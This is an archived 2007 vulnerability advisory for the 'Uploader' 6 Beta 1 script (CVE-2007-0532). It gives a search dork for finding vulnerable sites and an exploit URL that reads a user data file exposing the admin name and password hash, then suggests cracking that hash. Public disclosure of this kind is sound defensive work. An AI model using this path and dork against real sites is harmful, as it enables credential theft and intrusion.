Bug: Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability ( Ascii Version )

Search:
WLB2

Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability

Published
Credit
Risk
2007.01.29
BorN To K!LL
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-0532
No
Yes
 Dork: "Uploader Version 6 Beta 1"

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability

Script: Uploader

Version: 6 Beta 1

Dork: "Uploader Version 6 Beta 1"

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T:.
^^^^^
www.site.com/[upload-path]/userdata/user_1.txt

as We see Admin name & Hash .....
crack the password .... :)

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :

Dr.2 , Asbmay , General C , ToOoFa , Q8^RoCK , SHiKaA , str0ke
, ThE-LoRd-Of-CrAcKiNg

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version